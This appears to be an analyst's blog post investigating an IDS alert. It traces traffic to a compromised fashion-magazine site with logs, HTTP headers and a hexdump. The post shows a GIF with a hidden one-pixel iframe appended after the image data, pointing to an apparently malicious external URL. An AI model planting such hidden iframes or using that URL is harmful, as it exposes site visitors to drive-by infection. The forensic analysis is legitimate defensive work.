The IDS hit:
15:15:37 [1:2406560:255] ET RBN Known Russian Business Network IP TCP (281) [**] [Classification: Misc Attack] [Priority: 2] {TCP} int.ip:51352 -> 69.4.229.56:80
The httpry info:
magazine.gem-fashion.com 69.4.229.56 http://magazine.gem-fashion.com/wearing-jewelry.html
magazine.gem-fashion.com 69.4.229.56 http://magazine.gem-fashion.com/img/
From wearing-jewelry.html:
<td align="right" nowrap="nowrap"><label for="comment[comment]">Comment</label></td>
<td align="left"><textarea name="comment[comment]" cols="50" rows="5" id="comment[comment]" class=""></textarea></td>
</tr>
<tr>
<td colspan="2" align="center" nowrap="nowrap"><table border="0" cellspacing="0" cellpadding="3">
<tr align="center">
<td align="right"><img src="http://magazine.gem-fashion.com/img/" border="0" /></td>
<td align="left"><input type="button" value="Give me another word, please" class="sub" onclick="this.form.submit()" /></td>
</tr>
</table>
</td>
Header and file
GET /img/ HTTP/1.1
Cookie: <snip>
Host: magazine.gem-fashion.com
Accept: */*
Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive
HTTP/1.1 404 Object Not Found
Date: Fri, 24 Jun 2011 21:15:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: <snip>; path=/
Content-Length: 1221
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/gif
GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd.........TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,.............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~..
.a
.I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B.......I..H...9P....n%3
....7E...B..-B...
JhC..H...G...TaX@...D......%.@..!.........l.0.L....3n.r .."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:..@...W.#?.r......\x.."L.7..6M..-..?r..@d
..Q]b.......H4.3....&.........^|X.A..s./g........
Y.....O...P.)...@...;..r.p..6y....^..;,w.....i...4..p.x..I..E
...).<2
.......$...... ^.2.vo....`.(..y...B
M<..1
...dm)....y0.~.. ..D...Cs
.'B.#LD.w?..A.F.......b.....4d.0.5..`..9%.....@C.bIs.....R......z...R
.!e.U^.Z.. ..@..@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D
b.....B..4;.D.r7........P
eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2.@AA...C......J~ ......
.!..
!p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$....q.\....7D..
..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Hexdump of gif:
15:48:15 ~/Forensics/$ hexdump -C index.html.gif
00000000 47 49 46 38 37 61 96 00 1e 00 a5 00 00 04 02 04 |GIF87a..........|
00000010 84 82 84 44 42 44 c4 c2 c4 24 22 24 a4 a2 a4 64 |...DBD...$"$...d|
00000020 62 64 e4 e2 e4 14 12 14 94 92 94 54 52 54 d4 d2 |bd.........TRT..|
00000030 d4 34 32 34 b4 b2 b4 74 72 74 f4 f2 f4 0c 0a 0c |.424...trt......|
<snip>
00000420 05 37 44 10 86 0d c5 82 7c c7 a4 65 3a 14 c6 60 |.7D.....|..e:..`|
00000430 0e ab ac 85 c8 b0 bd 0b 02 05 2e 9c 2a 33 17 31 |............*3.1|
00000440 f9 1b 58 09 21 84 50 41 cc 3b 17 6d f4 d1 48 1b |..X.!.PA.;.m..H.|
00000450 1d 04 00 3b 3c 69 66 72 61 6d 65 20 73 72 63 3d |...;<iframe src=|
00000460 27 68 74 74 70 3a 2f 2f 61 6c 61 71 69 71 2e 6e |'http://alaqiq.n|
00000470 65 74 2f 71 75 72 61 6e 2f 67 73 74 61 74 61 2f |et/quran/gstata/|
00000480 69 6e 64 65 78 2e 70 68 70 27 20 77 69 64 74 68 |index.php' width|
00000490 3d 27 31 27 20 68 65 69 67 68 74 3d 27 31 27 20 |='1' height='1' |
000004a0 73 74 79 6c 65 3d 27 76 69 73 69 62 69 6c 69 74 |style='visibilit|
000004b0 79 3a 20 68 69 64 64 65 6e 3b 27 3e 3c 2f 69 66 |y: hidden;'></if|
000004c0 72 61 6d 65 3e |rame>|
000004c5
No comments:
Post a Comment